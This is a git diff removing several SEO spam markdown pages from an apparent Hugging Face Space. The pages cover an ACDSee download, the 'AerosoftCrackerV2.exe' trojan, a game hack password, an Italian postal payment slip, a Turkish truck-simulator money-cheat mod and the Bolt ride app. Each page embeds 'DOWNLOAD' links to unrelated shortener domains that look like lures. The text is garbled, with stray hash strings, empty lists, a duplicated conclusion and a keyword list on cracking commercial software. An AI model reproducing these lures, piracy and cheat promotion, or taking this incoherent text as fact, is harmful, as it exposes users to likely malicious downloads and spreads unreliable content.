diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md deleted file mode 100644 index 8f4fba51302f78cb622d13e4a8de6491a76e6227..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md +++ /dev/null @@ -1,29 +0,0 @@ - -

How to Free Download ACDSee for Windows 10

-

If you are looking for a powerful and easy-to-use photo editing software, you might want to try ACDSee. ACDSee is a popular program that allows you to organize, edit, and share your photos with ease. It has many features and tools that can help you enhance your images and create stunning results.

-

free download acdsee for windows 10


DOWNLOAD ►►► https://byltly.com/2uKxji



-

But how can you get ACDSee for Windows 10? Is there a way to free download it? The answer is yes, but you need to be careful. There are many websites that claim to offer free downloads of ACDSee, but some of them might be scams or contain viruses. You don't want to risk your computer's security or waste your time with fake downloads.

-

That's why we recommend you to use the official website of ACDSee. There, you can find the latest version of ACDSee for Windows 10, as well as other products and services from the company. You can also get a free trial of ACDSee for 30 days, which will let you test all the features and functions of the software before you decide to buy it.

-

To free download ACDSee for Windows 10 from the official website, follow these steps:

-
    -
  1. Go to https://www.acdsee.com/en/index/ and click on the "Download" button at the top right corner.
  2. -
  3. Select the product you want to download. In this case, choose "ACDSee Photo Studio Ultimate 2023" or "ACDSee Photo Studio Professional 2023", depending on your needs and preferences.
  4. -
  5. Click on the "Free Trial" button and fill in your name and email address. You will receive a confirmation email with a link to download the software.
  6. -
  7. Click on the link in the email and follow the instructions to install ACDSee on your Windows 10 computer.
  8. -
  9. Enjoy your free trial of ACDSee for 30 days. You can use all the features and tools of the software without any limitations or watermarks.
  10. -
-

That's it! You have successfully free downloaded ACDSee for Windows 10. Now you can start editing and sharing your photos with this amazing software. If you like it, you can purchase a license from the official website or from an authorized reseller. ACDSee offers different plans and prices to suit your budget and needs.

-

We hope this article was helpful and informative. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading!

-

- -

Why Choose ACDSee for Windows 10?

-

ACDSee is one of the best photo editing software for Windows 10. It has many advantages and benefits that make it stand out from other programs. Here are some of the reasons why you should choose ACDSee for Windows 10:

- -

As you can see, ACDSee is a great choice for Windows 10 users who want to edit and manage their photos in a fast, easy, and professional way. If you haven't tried it yet, don't miss this opportunity to free download ACDSee for Windows 10 from the official website. You won't regret it!

ddb901b051
-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md deleted file mode 100644 index b404f57a568c080885e91f518a0681b2f49cb166..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md +++ /dev/null @@ -1,151 +0,0 @@ - -

What is AerosoftCrackerV2.exe and why you should avoid it

-

Have you ever heard of AerosoftCrackerV2.exe? If you are a fan of flight simulation games, you may have come across this file online. It claims to be a crack for Aerosoft products, which are popular add-ons for Microsoft Flight Simulator X (FSX) and Prepar3D (P3D). However, don't be fooled by its name. AerosoftCrackerV2.exe is not a legitimate crack, but a malicious program that can harm your computer and compromise your security.

-

In this article, we will explain what AerosoftCrackerV2.exe is, how it works, what are the symptoms of its infection, how to remove it from your computer, and how to prevent it from infecting your computer in the future. By reading this article, you will learn how to protect yourself from this dangerous threat and enjoy your flight simulation games safely.

-

AerosoftCrackerV2.exel


DOWNLOAD ✔✔✔ https://byltly.com/2uKzBd



-

How does AerosoftCrackerV2.exe work?

-

AerosoftCrackerV2.exe is a type of malware that belongs to the Trojan category. A Trojan is a program that pretends to be something else in order to trick users into downloading or running it. Once executed, a Trojan can perform various malicious actions on the infected computer without the user's knowledge or consent.

-

AerosoftCrackerV2.exe works by posing as a crack for Aerosoft products. A crack is a program that modifies or bypasses the security features of a software product in order to use it for free or without restrictions. Some users may be tempted to use cracks for flight simulation add-ons because they are expensive or hard to find. However, using cracks is illegal and risky, as they may contain malware or viruses that can damage your computer or steal your personal information.

-

When you download or run AerosoftCrackerV2.exe on your computer, it will install itself in a hidden location and create several files and registry entries that allow it to run automatically every time you start your computer. It will also try to disable your antivirus software or firewall in order to avoid detection and removal. Then, it will perform various malicious activities on your computer, such as:

- -

What are the symptoms of AerosoftCrackerV2.exe infection?

-

If your computer is infected by AerosoftCrackerV2.exe, you may notice some of the following signs:

- -

How to remove AerosoftCrackerV2.exe from your computer?

-

If you suspect that your computer is infected by AerosoftCrackerV2.exe, you should take immediate action to remove it from your computer. There are two methods that you can use to remove AerosoftCrackerV2.exe: manual removal method and automatic removal method.

-

Manual removal method

-

The manual removal method involves deleting AerosoftCrackerV2.exe and its related files and registry entries from your computer manually. This method requires some technical skills and knowledge of how to access and modify system files and settings. If you are not confident or experienced in doing this, we recommend that you use the automatic removal method instead.

-

To manually remove AerosoftCrackerV2.exe from your computer, follow these steps:

-
    -
  1. Restart your computer in Safe Mode with Networking. To do this, press F8 repeatedly while booting up until you see a menu with different options. Choose Safe Mode with Networking and press Enter.
  2. -
  3. Open Task Manager by pressing Ctrl+Alt+Delete keys together. Look for any suspicious processes that are related to AerosoftCrackerV2.exe and end them.
  4. -
  5. Open File Explorer by pressing Windows+E keys together. Navigate to the following locations and delete any files or folders that are related to AerosoftCrackerV2.exe:
  6. - -
  7. Open Registry Editor by pressing Windows+R keys together and typing regedit in the Run box. Click OK. Navigate to the following registry keys and delete any sub-keys or values that are related to AerosoftCrackerV2.exe:
  8. - -
  9. Close Registry Editor and restart your computer normally.
  10. -
-

Automatic removal method

-

The automatic removal method involves using a reliable anti-malware tool to scan and remove AerosoftCrackerV2.exe and its related files and registry entries from your computer automatically. This method is easier and safer than the manual removal method, as it does not require any technical skills or knowledge of how to access and modify system files and settings. It also ensures that no traces of AerosoftCrackerV2.exe are left behind on your computer.

-

How to use AerosoftCrackerV2.exel to crack software
-AerosoftCrackerV2.exel download link
-Is AerosoftCrackerV2.exel safe and virus-free?
-AerosoftCrackerV2.exel tutorial and guide
-AerosoftCrackerV2.exel reviews and feedback
-AerosoftCrackerV2.exel alternatives and competitors
-AerosoftCrackerV2.exel compatibility and requirements
-AerosoftCrackerV2.exel features and benefits
-AerosoftCrackerV2.exel updates and patches
-AerosoftCrackerV2.exel license and terms of use
-AerosoftCrackerV2.exel support and customer service
-AerosoftCrackerV2.exel errors and troubleshooting
-AerosoftCrackerV2.exel tips and tricks
-AerosoftCrackerV2.exel best practices and recommendations
-AerosoftCrackerV2.exel case studies and success stories
-How to uninstall AerosoftCrackerV2.exel
-How to optimize AerosoftCrackerV2.exel performance
-How to customize AerosoftCrackerV2.exel settings
-How to integrate AerosoftCrackerV2.exel with other tools
-How to backup and restore AerosoftCrackerV2.exel data
-How to upgrade from AerosoftCrackerV1 to AerosoftCrackerV2.exel
-How to get a free trial of AerosoftCrackerV2.exel
-How to buy AerosoftCrackerV2.exel with a discount code
-How to contact the developer of AerosoftCrackerV2.exel
-How to report a bug or issue with AerosoftCrackerV2.exel
-How to join the community of AerosoftCrackerV2.exel users
-How to access the documentation of AerosoftCrackerV2.exel
-How to learn more about the technology behind AerosoftCrackerV2.exel
-How to crack Adobe Photoshop with AerosoftCrackerV2.exel
-How to crack Microsoft Office with AerosoftCrackerV2.exel
-How to crack Autodesk AutoCAD with AerosoftCrackerV2.exel
-How to crack CorelDRAW with AerosoftCrackerV2.exel
-How to crack FL Studio with AerosoftCrackerV2.exel
-How to crack Adobe Premiere Pro with AerosoftCrackerV2.exel
-How to crack Sony Vegas Pro with AerosoftCrackerV2.exel
-How to crack Ableton Live with AerosoftCrackerV2.exel
-How to crack Adobe Illustrator with AerosoftCrackerV2.exel
-How to crack Adobe InDesign with AerosoftCrackerV2.exel
-How to crack Adobe After Effects with AerosoftCrackerV2.exel
-How to crack Adobe Acrobat Pro with AerosoftCrackerV2.exel
-How to crack SketchUp Pro with AerosoftCrackerV2.exel
-How to crack Camtasia Studio with AerosoftCrackerV2.exel
-How to crack Nero Burning ROM with AerosoftCrackerV2.exel
-How to crack WinRAR with AerosoftCrackerV2.exel
-How to crack VMware Workstation with AerosoftCrackerV2.exel
-How to crack CyberLink PowerDVD with AerosoftCrackerV2.exel
-How to crack Avast Antivirus with AerosoftCrackerV2.exel
-How to crack Malwarebytes Anti-Malware with AerosoftCrackerV2.exel
-How to crack CCleaner Professional with AerosoftCrackerV2.exel

-

To automatically remove AerosoftCrackerV2.exe from your computer, follow these steps:

-
    -
  1. Download and install a reputable anti-malware tool on your computer. You can choose from various options, such as Malwarebytes, SpyHunter, Trend Micro, etc.
  2. -
  3. Launch the anti-malware tool and update its database to the latest version.
  4. -
  5. Perform a full system scan with the anti-malware tool and wait for it to finish.
  6. -
  7. Review the scan results and select all the detected threats related to AerosoftCrackerV2.exe.
  8. -
  9. Click on the Remove or Quarantine button to delete or isolate AerosoftCrackerV2.exe and its related files and registry entries from your computer.
  10. -
  11. Restart your computer if prompted by the anti-malware tool.
  12. -
-

How to prevent AerosoftCrackerV2.exe infection in the future?

-

Now that you have removed AerosoftCrackerV2.exe from your computer, you may wonder how to prevent it from infecting your computer again in the future. Here are some tips that you can follow to avoid downloading or running malicious programs like AerosoftCrackerV2.exe:

- -

Conclusion

-

AerosoftCrackerV2.exe is a malicious program that claims to be a crack for Aerosoft products, which are popular add-ons for flight simulation games. However, it is not a legitimate crack, but a Trojan that can harm your computer and compromise your security. It can perform various malicious activities on your computer, such as downloading and installing other malware or viruses, stealing your personal information, monitoring your online activities, displaying unwanted ads or pop-ups, redirecting your web browser to malicious websites, slowing down your computer performance or causing crashes or errors.

-

To protect yourself from this dangerous threat, you should avoid using cracks for flight simulation add-ons or any other software products. You should also only download flight simulation add-ons or any other software products from official or trusted sources. You should always scan any downloaded files with a reliable anti-virus or anti-malware tool before opening or running them. You should also keep your operating system and software products updated with the latest patches and security fixes. You should also use a strong password for your online accounts and change it regularly. You should also backup your important data regularly to an external drive or cloud storage.

-

If you suspect that your computer is infected by AerosoftCrackerV2.exe, you should take immediate action to remove it from your computer. You can use either the manual removal method or the automatic removal method to do so. The manual removal method involves deleting AerosoftCrackerV2.exe and its related files and registry entries from your computer manually. The automatic removal method involves using a reliable anti-malware tool to scan and remove AerosoftCrackerV2.exe and its related files and registry entries from your computer automatically.

-

We hope this article has helped you understand what AerosoftCrackerV2.exe is, how it works, what are the symptoms of its infection, how to remove it from your computer, and how to prevent it from infecting your computer in the future. By following these tips, you will be able to enjoy your flight simulation games safely and securely.

-

FAQs

-

Here are some frequently asked questions and answers about AerosoftCrackerV2.exe:

-
    -
  1. What is Aerosoft?
  2. -

    Aerosoft is a German company that develops and publishes add-ons for flight simulation games, such as Microsoft Flight Simulator X (FSX) and Prepar3D (P3D). They offer various products that enhance the realism and immersion of flight simulation games, such as airports, aircrafts, sceneries, tools, etc.

    -
  3. What is a crack?
  4. -

    A crack is a program that modifies or bypasses the security features of a software product in order to use it for free or without restrictions. Some users may be tempted to use cracks for flight simulation add-ons because they are expensive or hard to find. However, using cracks is illegal and risky, as they may contain malware or viruses that can damage your computer or steal your personal information.

    -
  5. What is a Trojan?
  6. -

    A Trojan is a type of malware that pretends to be something else in order to trick users into downloading or running it. Once executed, a Trojan can perform various malicious actions on the infected computer without the user's knowledge or consent. Trojans are often used by hackers to gain remote access to computers, steal data, install other malware, etc.

    -
  7. How can I tell if my computer is infected by AerosoftCrackerV2.exe?
  8. -

    If your computer is infected by AerosoftCrackerV2.exe, you may notice some of the following signs: Your antivirus software or firewall is disabled or not working properly; Your computer runs slower than usual or freezes frequently; You see strange files or folders on your computer that you don't recognize; You see unwanted ads or pop-ups on your screen that are related to flight simulation products or services; Your web browser is redirected to unfamiliar websites that ask you to download or buy something; You receive warnings or alerts from unknown sources that claim your computer is infected or needs repair; You notice unauthorized charges on your credit card or bank account statements.

    -
  9. How can I protect my computer from malware?
  10. -

    You can protect your computer from malware by following some simple tips, such as: Use a firewall and an anti-malware tool and keep them updated; Don't open email messages from unfamiliar senders or email attachments that you don't recognize; Use a pop-up blocker and a modern browser with SmartScreen enabled; Pay attention to Windows SmartScreen notifications and don't run unrecognized apps downloaded from the internet; Keep Windows and other software products updated with the latest patches and security fixes; Use strong passwords and change them regularly; Backup your important data regularly to an external drive or cloud storage.

    -
-

0a6ba089eb
-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md b/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md deleted file mode 100644 index 57235a8cc6310ad0e241d3326cdd5d411c01f8bb..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md +++ /dev/null @@ -1,6 +0,0 @@ -

ABYSS CRAWLERS plus game hack password


Download Filehttps://imgfil.com/2uxYWD



- - d5da3c52bf
-
-
-

diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md b/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md deleted file mode 100644 index 60607a7b3a3d6fcdbf775a1739dc1145bb0c4f77..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md +++ /dev/null @@ -1,75 +0,0 @@ - -

Bollettino Postale 896 22.pdf: come scaricarlo e pagarlo online

-

Il bollettino postale è uno dei metodi più usati per effettuare pagamenti a soggetti pubblici o privati che dispongono di un conto corrente postale. Esistono diversi tipi di bollettini postali, a seconda della finalità e della modalità di compilazione. In questo articolo ci concentreremo sul bollettino postale 896 22.pdf, un bollettino precompilato che serve per il versamento di tasse, contributi, bolli e altri oneri. Vedremo cos'è, come compilarlo, dove trovarlo e come pagarlo online.

-

Cos'è il bollettino postale 896 22.pdf?

-

Il bollettino postale 896 22.pdf è un documento che consente di effettuare un versamento presso un qualsiasi ufficio postale, in favore di un determinato soggetto titolare di un conto corrente postale. Si tratta di un bollettino precompilato, ovvero che presenta già alcuni campi riempiti con le informazioni necessarie per il pagamento. Questo tipo di bollettino è usato per il versamento di tasse, contributi, bolli e altri oneri.

-

Bollettino Postale 896 22.pdfl


Download > https://imgfil.com/2uxXMr



-

Come compilare il bollettino postale 896 22.pdf?

-

Per compilare il bollettino postale 896 22.pdf devi inserire i seguenti dati:

- -

Dove trovare il bollettino postale 896 22.pdf?

-

Puoi trovare il bollettino postale 896 22.pdf in diversi modi:

- -

Come pagare il bollettino postale 896 22.pdf online?

-

Se vuoi evitare le code agli uffici postali, puoi pagare il bollettino postale 896 22.pdf online, tramite i seguenti servizi:

-

-

Quali sono i vantaggi e gli svantaggi del bollettino postale 896 22.pdf?

-

Il bollettino postale 896 22.pdf è un metodo di pagamento molto diffuso e utilizzato in Italia. Tuttavia, come ogni cosa, ha dei vantaggi e degli svantaggi che devi conoscere prima di usarlo. Vediamoli insieme:

- -

Come risolvere i problemi con il bollettino postale 896 22.pdf?

-

A volte può capitare di avere dei problemi con il bollettino postale 896 22.pdf. Ad esempio, puoi averlo perso, sbagliato, strappato o non ricevuto. In questi casi, devi sapere come risolvere la situazione. Ecco alcuni consigli:

- -

Quali sono le alternative al bollettino postale 896 22.pdf?

-

Se non vuoi usare il bollettino postale 896 22.pdf per effettuare i tuoi pagamenti, puoi scegliere tra diverse alternative. Alcune di queste sono:

- -

Conclusione

-

Il bollettino postale 896 22.pdf è uno dei metodi più usati per effettuare pagamenti a soggetti pubblici o privati che dispongono di un conto corrente postale. Si tratta di un bollettino precompilato che serve per il versamento di tasse, contributi, bolli e altri oneri. Per usarlo devi compilare alcuni campi con i dati richiesti e portarlo all'ufficio postale o pagarlo online. Il bollettino postale 896 22.pdf ha dei vantaggi e degli svantaggi che devi conoscere prima di sceglierlo. Inoltre, esistono delle alternative al bollettino postale 896 22.pdf che puoi valutare in base alle tue esigenze e preferenze.

-

-

Conclusione

-

Il bollettino postale 896 22.pdf è uno dei metodi più usati per effettuare pagamenti a soggetti pubblici o privati che dispongono di un conto corrente postale. Si tratta di un bollettino precompilato che serve per il versamento di tasse, contributi, bolli e altri oneri. Per usarlo devi compilare alcuni campi con i dati richiesti e portarlo all'ufficio postale o pagarlo online. Il bollettino postale 896 22.pdf ha dei vantaggi e degli svantaggi che devi conoscere prima di sceglierlo. Inoltre, esistono delle alternative al bollettino postale 896 22.pdf che puoi valutare in base alle tue esigenze e preferenze.

3cee63e6c2
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md deleted file mode 100644 index 5fac705814d0c8627255d0661104e8d82b8bed0f..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md +++ /dev/null @@ -1,109 +0,0 @@ -
-

Truck Simulator Ultimate Apk: A Realistic and Fun Truck Driving Game

-

If you are a fan of truck driving games, you might have heard of Truck Simulator Ultimate Apk, a new and exciting game that lets you experience the thrill of driving a truck across different countries and continents. In this article, we will tell you everything you need to know about this game, including its features, how to download and install it, and how to get para hilesi from Android Oyun Club, a popular Turkish website for modded games.

-

What is Truck Simulator Ultimate Apk?

-

Truck Simulator Ultimate Apk is a simulation game developed by Zuuks Games, the same company that created Bus Simulator and Euro Truck Driver. The game was released in September 2021 and has already gained millions of downloads and positive reviews from players around the world. The game aims to provide a realistic and fun truck driving experience, with stunning graphics, realistic physics, and diverse gameplay options.

-

truck simulator ultimate apk android oyun club para hilesi


Download File >> https://urlin.us/2uSTWc



-

Features of Truck Simulator Ultimate Apk

-

Truck Simulator Ultimate Apk has many features that make it stand out from other truck driving games. Here are some of them:

-

Realistic truck models and physics

-

The game features over 30 different truck models from famous brands such as Mercedes-Benz, Volvo, Scania, MAN, Renault, and more. Each truck has its own specifications, performance, and sound effects. The game also uses advanced physics engine to simulate the weight, speed, braking, steering, suspension, and damage of the trucks.

-

Customizable trucks and trailers

-

You can customize your trucks and trailers with various options such as paint, decals, wheels, lights, horns, exhausts, bumpers, spoilers, and more. You can also upgrade your trucks with different engines, transmissions, chassis, tires, and accessories. You can create your own unique truck style and show it off to other players.

-

Dynamic weather and day-night cycle

-

The game has a dynamic weather system that changes according to the location and time of the day. You can drive in sunny, rainy, snowy, foggy, or stormy conditions. You can also experience the day-night cycle that affects the visibility and traffic on the roads. You have to adapt your driving style to the changing weather and lighting conditions.

-

Various cargo types and delivery missions

-

The game offers a variety of cargo types such as containers, cars, logs, food, chemicals, livestock, and more. You have to load your cargo onto your trailer and deliver it to the destination safely and on time. You have to follow the traffic rules, avoid accidents, pay tolls, refuel your truck, rest when needed, and manage your budget. You can earn money and experience points by completing delivery missions.

-

truck simulator ultimate apk indir android oyun club
-truck simulator ultimate apk hileli oyun indir club
-truck simulator ultimate apk mod para hilesi android
-truck simulator ultimate apk full sürüm android oyun club
-truck simulator ultimate apk son sürüm para hileli
-truck simulator ultimate apk android oyun club güncel
-truck simulator ultimate apk ücretsiz para hilesi indir
-truck simulator ultimate apk android oyun club kurulumu
-truck simulator ultimate apk hile nasıl yapılır android oyun club
-truck simulator ultimate apk android oyun club yorumları
-truck simulator ultimate apk android oyun club alternatifleri
-truck simulator ultimate apk android oyun club benzeri oyunlar
-truck simulator ultimate apk android oyun club sistem gereksinimleri
-truck simulator ultimate apk android oyun club online modu
-truck simulator ultimate apk android oyun club multiplayer özelliği
-truck simulator ultimate apk android oyun club grafik ayarları
-truck simulator ultimate apk android oyun club türkçe dil desteği
-truck simulator ultimate apk android oyun club araç modelleri
-truck simulator ultimate apk android oyun club harita genişliği
-truck simulator ultimate apk android oyun club gerçekçilik seviyesi
-truck simulator ultimate apk android oyun club tycoon modu nedir
-truck simulator ultimate apk android oyun club tycoon modu hileleri
-truck simulator ultimate apk android oyun club tycoon modu ipuçları
-truck simulator ultimate apk android oyun club tycoon modu rehberi
-truck simulator ultimate apk android oyun club tycoon modu stratejileri
-truck simulator ultimate apk android oyun club tycoon modu en iyi araçlar
-truck simulator ultimate apk android oyun club tycoon modu en iyi rotalar
-truck simulator ultimate apk android oyun club tycoon modu en iyi yatırımlar
-truck simulator ultimate apk android oyun club tycoon modu en iyi personel
-truck simulator ultimate apk android oyun club tycoon modu en iyi müşteriler
-truck simulator ultimate apk para hilesi nasıl yapılır android
-truck simulator ultimate apk para hilesi indirme linki android
-truck simulator ultimate apk para hilesi güvenli mi android
-truck simulator ultimate apk para hilesi ban riski var mı android
-truck simulator ultimate apk para hilesi avantajları nelerdir android
-truck simulator ultimate apk para hilesi dezavantajları nelerdir android
-truck simulator ultimate apk para hilesi kullanıcı yorumları android
-truck simulator ultimate apk para hilesi video anlatımı android
-truck simulator ultimate apk para hilesi sorun çözümleri android
-truck simulator ultimate apk para hilesi alternatif yöntemler android
-zuuks games truck simulator ultimate apk indir para hileli
-zuuks games truck simulator ultimate apk güncelleme para hileli
-zuuks games truck simulator ultimate apk inceleme para hileli
-zuuks games truck simulator ultimate apk özellikleri para hileli
-zuuks games truck simulator ultimate apk farkı nedir para hileli
-zuuks games truck simulator ultimate ap

-

Multiplayer mode and online ranking system

-

The game has a multiplayer mode that allows you to play with other players online. You can join or create a convoy with your friends or other players and drive together on the same map. You can chat with other players using voice or text messages. You can also compete with other players in the online ranking system based on your level, money earned, distance driven, cargo delivered, etc.

-

How to download and install Truck Simulator Ultimate Apk?

-

If you want to download and install Truck Simulator Ultimate Apk on your Android device, you can follow these simple steps:

-

Requirements and compatibility

-

Before you download and install the game, you need to make sure that your device meets the minimum requirements and is compatible with the game. The game requires Android 5.0 or higher, at least 3 GB of RAM, and 1.5 GB of free storage space. The game also supports 64-bit devices and controllers.

-

Download link and installation steps

-

You can download the game from the official Google Play Store by clicking on this link. Alternatively, you can also download the game from other sources such as APKPure or APKMirror, but make sure that you download the latest version and from a trusted website. After you download the game, you need to follow these steps to install it:

- -

Congratulations, you have successfully installed Truck Simulator Ultimate Apk on your device. You can now enjoy driving your truck across different countries and continents.

-

What is Android Oyun Club and how to get para hilesi?

-

If you want to enhance your gaming experience and get some extra benefits in Truck Simulator Ultimate Apk, you might be interested in Android Oyun Club and para hilesi. Let's see what they are and how to use them.

-

Android Oyun Club: a popular Turkish website for modded games

-

Android Oyun Club is a website that provides modded versions of various Android games, including Truck Simulator Ultimate Apk. A modded game is a game that has been modified or hacked to provide some advantages or features that are not available in the original game. For example, a modded game might have unlimited money, unlocked items, premium features, etc.

-

Para hilesi: a cheat that gives unlimited money in the game

-

Para hilesi is a Turkish term that means money cheat. It is a cheat that gives you unlimited money in Truck Simulator Ultimate Apk. With unlimited money, you can buy any truck, trailer, upgrade, or customization that you want without worrying about your budget. You can also skip some delivery missions that are too hard or boring for you.

-

How to use para hilesi in Truck Simulator Ultimate Apk?

-

If you want to use para hilesi in Truck Simulator Ultimate Apk, you need to download the modded version of the game from Android Oyun Club. You can find the link to the modded game here. After you download the modded game, you need to follow these steps to use para hilesi:

- -

Enjoy playing Truck Simulator Ultimate Apk with para hilesi from Android Oyun Club.

-

Conclusion

-

In this article, we have covered everything you need to know about Truck Simulator Ultimate Apk, a realistic and fun truck driving game. We have explained its features, how to download and install it, and how to get para hilesi from Android Oyun Club. We hope that this article has been helpful and informative for you. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading and happy trucking!

-

Frequently Asked Questions

-

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md deleted file mode 100644 index 4f4e42e632e18b544cb02ab393bce29333722c3f..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md +++ /dev/null @@ -1,150 +0,0 @@ - -

What is APK Bolt and How to Use It?

-

Introduction

-

If you are looking for a convenient and cost-effective way to get around your city, you might want to try out APK Bolt. APK Bolt is an Android app that allows you to request a ride from a nearby driver, and enjoy a low-cost ride to your destination. But what exactly is an APK file, and what is Bolt? In this article, we will explain what APK Bolt is, how it works, what are its benefits, how to download and install it, and how it compares with other transportation apps.

-

apk bolt


Download ✏ ✏ ✏ https://urlin.us/2uSV9h



-

What is an APK file?

-

An APK file is a file format that is used to distribute and install applications on Android devices. APK stands for Android Package Kit, and it contains all the files and code that are needed for an app to run on your device. You can download APK files from various sources, such as the Google Play Store, third-party websites, or directly from the app developers. However, you need to enable the option to install apps from unknown sources in your device settings before you can install an APK file.

-

What is Bolt?

-

Bolt is a transportation app that was formerly known as Taxify. It was founded in 2013 in Estonia, and it operates in 45 countries and 400 cities around the world. Bolt's mission is to provide fast, reliable, and affordable transportation to millions of people, while also helping thousands of drivers support their families. Bolt offers different types of services, such as ride-hailing, car-sharing, scooter-sharing, food delivery, and electric bikes.

-

What is APK Bolt?

-

APK Bolt is the name of the Android app that you can use to access the Bolt services on your device. You can download the APK Bolt file from various sources, such as [APKCombo](^1^), [APKPure], or [Uptodown]. With APK Bolt, you can tap the button to order a ride, see the price of your ride before you order, use a range of safety features, pay inside the app or with cash, and leave a rating for your driver.

-

Benefits of Using APK Bolt

-

Fast and Affordable Rides

-

One of the main benefits of using APK Bolt is that you can get a comfortable, low-cost ride in minutes. You don't have to wait for a long time for a driver to pick you up, as there are thousands of drivers available 24/7. You also don't have to pay a lot for your ride, as APK Bolt offers competitive prices that are cheaper than other transportation apps. You can also save money by using promo codes, discounts, and offers that are regularly available on the app.

-

apk bolt: request a ride
-apk bolt driver: drive with bolt
-apk bolt food: food delivery
-apk bolt business: manage your rides
-apk bolt lite: low-cost rides
-apk bolt browser: fast and secure web browser
-apk bolt taxi: book a taxi online
-apk bolt scooter: electric scooter rental
-apk bolt mod: unlocked features and unlimited money
-apk bolt vpn: protect your privacy online
-apk bolt app: download and install bolt app
-apk bolt game: race and drift with bolt cars
-apk bolt launcher: customize your home screen
-apk bolt video downloader: download videos from any website
-apk bolt music player: play and stream music offline
-apk bolt photo editor: edit and enhance your photos
-apk bolt keyboard: type faster and easier
-apk bolt lock screen: secure your phone with bolt pattern
-apk bolt wallpaper: beautify your phone with bolt wallpapers
-apk bolt theme: change the look and feel of your phone
-apk bolt chat: chat and make new friends
-apk bolt social media: connect with people around the world
-apk bolt news: get the latest news and updates
-apk bolt weather: check the weather forecast and alerts
-apk bolt maps: navigate and explore with bolt maps
-apk bolt fitness: track your health and fitness goals
-apk bolt calculator: perform calculations and conversions
-apk bolt clock: set alarms and timers with bolt clock
-apk bolt calendar: organize your schedule and events
-apk bolt notes: take notes and reminders with bolt notes
-apk bolt file manager: manage your files and folders
-apk bolt antivirus: protect your phone from viruses and malware
-apk bolt cleaner: optimize your phone performance and battery life
-apk bolt flashlight: turn your phone into a flashlight
-apk bolt compass: find your direction with bolt compass
-apk bolt qr scanner: scan qr codes and barcodes
-apk bolt pdf reader: view and edit pdf files
-apk bolt translator: translate text and speech in any language
-apk bolt voice recorder: record and play audio files
-apk bolt radio: listen to live radio stations online
-apk bolt podcast: discover and listen to podcasts on any topic
-apk bolt ebook reader: read ebooks and audiobooks offline
-apk bolt shopping: shop online and get the best deals
-apk bolt travel: book flights, hotels, and car rentals online
-apk bolt dating: find your match and date online
-apk bolt learning: learn new skills and hobbies online
-apk bolt entertainment: watch movies, shows, and live tv online
-apk bolt sports: follow your favorite sports teams and players online
-apk bolt finance: manage your money and investments online

-

Safety Features

-

Another benefit of using APK Bolt is that you can use a range of safety features that ensure your security and peace of mind. For example, you can share details of your journey with your friends or family members, so they can track your location and status. You can also contact the customer support team or the emergency services in case you need any assistance or help. Moreover, you can see the ratings and reviews of your driver before you accept the ride, so you can choose the best option for you.

-

Flexible Payment Options

-

A third benefit of using APK Bolt is that you can choose from different payment options that suit your preference and convenience. You can pay inside the app using your credit or debit card, or you can also pay with cash, or use other methods such as PayPal, Google Pay, or Apple Pay. You can also tip your driver if you are satisfied with their service, and rate them after the ride.

-

How to Download and Install APK Bolt

-

Steps to Download APK Bolt

-

If you want to download APK Bolt on your Android device, you can follow these simple steps:

-
    -
  1. Go to one of the sources that offer the APK Bolt file, such as [APKCombo], [APKPure], or [Uptodown].
  2. -
  3. Search for APK Bolt in the search bar, or browse the categories to find it.
  4. -
  5. Tap on the APK Bolt icon, and then tap on the download button.
  6. -
  7. Wait for the download to finish, and then locate the file in your device storage.
  8. -
-

Steps to Install APK Bolt

-

Before you can install APK Bolt on your device, you need to enable the option to install apps from unknown sources. To do this, you can follow these steps:

-
    -
  1. Go to your device settings, and then tap on security or privacy.
  2. -
  3. Find the option that says "Unknown sources" or "Install unknown apps", and toggle it on.
  4. -
  5. Confirm your choice by tapping on OK or Allow.
  6. -
-

Once you have enabled this option, you can install APK Bolt by following these steps:

-
    -
  1. Locate the APK Bolt file in your device storage, and tap on it.
  2. -
  3. Tap on Install, and wait for the installation to complete.
  4. -
  5. Tap on Open, and grant the necessary permissions to the app.
